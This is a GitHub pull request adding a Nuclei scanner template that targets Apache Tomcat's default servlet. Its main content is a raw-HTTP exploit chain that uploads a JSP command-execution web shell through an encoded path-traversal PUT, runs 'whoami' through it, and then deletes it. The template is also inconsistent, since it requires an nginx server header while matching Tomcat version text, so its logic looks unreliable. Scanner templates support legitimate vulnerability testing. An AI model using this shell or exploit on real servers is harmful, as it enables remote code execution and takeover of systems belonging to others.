Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added template for tomcat-default-servlet-upload #11482

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
+108 −0
Open

Added template for tomcat-default-servlet-upload #11482

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
108 changes: 108 additions & 0 deletions tomcat-default-servlet-upload.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,108 @@
id: tomcat-default-servlet-upload

info:
name: Tomcat Default Servlet Write Vulnerability
author: ProjectDiscoveryAI
severity: high
description: |
This template exploits a vulnerability in certain versions of Apache Tomcat where the default servlet is misconfigured to allow write operations on a case-insensitive file system, such as Windows or macOS. The vulnerability allows uploading a JSP web shell to the server and validating execution.
tags: intrusive

http:
# Step 1: Pre-check to confirm Tomcat server and detect default servlet misconfigurations
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0

matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: headers
regex:
- "server:.*nginx"
- type: regex
part: body
regex:
- "Apache Tomcat/(11\\.0\\.[01]|10\\.1\\.[0-9]{1,2}|9\\.0\\.[0-9]{1,2})"
- type: word
part: body
words:
- "Default Servlet"

# Step 2: Upload the malicious JSP shell
- raw:
- |
PUT /default~Servlet/.%2e/%c0%ae%c0%ae/%c0%ae/webapps/ROOT/shell.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
User-Agent: Mozilla/5.0

<%@ page import="java.io.*" %>
<html>
<body>
<%

Check failure on line 48 in tomcat-default-servlet-upload.yaml

View workflow job for this annotation

GitHub Actions / lint 

48:11 [trailing-spaces] trailing spaces
String cmd = request.getParameter("cmd");

Check failure on line 49 in tomcat-default-servlet-upload.yaml

View workflow job for this annotation

GitHub Actions / lint 

49:54 [trailing-spaces] trailing spaces
Process p = Runtime.getRuntime().exec(cmd);

Check failure on line 50 in tomcat-default-servlet-upload.yaml

View workflow job for this annotation

GitHub Actions / lint 

50:56 [trailing-spaces] trailing spaces
OutputStream os = p.getOutputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {

Check failure on line 54 in tomcat-default-servlet-upload.yaml

View workflow job for this annotation

GitHub Actions / lint 

54:57 [trailing-spaces] trailing spaces
out.println(line + "<br>");

Check failure on line 55 in tomcat-default-servlet-upload.yaml

View workflow job for this annotation

GitHub Actions / lint 

55:44 [trailing-spaces] trailing spaces
}
%>
</body>
</html>

matchers-condition: and
matchers:
- type: status
status:
- 200
- 201

# Step 3: Verify file upload
- raw:
- |
GET /shell.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0

matchers:
- type: word
words:
- "<%@ page import"

# Step 4: Execute uploaded shell to validate RCE
- raw:
- |
GET /shell.jsp?cmd=whoami HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0

matchers-condition: and
matchers:
- type: word
words:
- "root" # Adjust based on expected output for successful command execution
- type: status
status:
- 200

# Step 5: Cleanup uploaded shell
- raw:
- |
DELETE /shell.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
X-Custom-Header: [email protected]

matchers:
- type: status
status:
- 200
- 404
Loading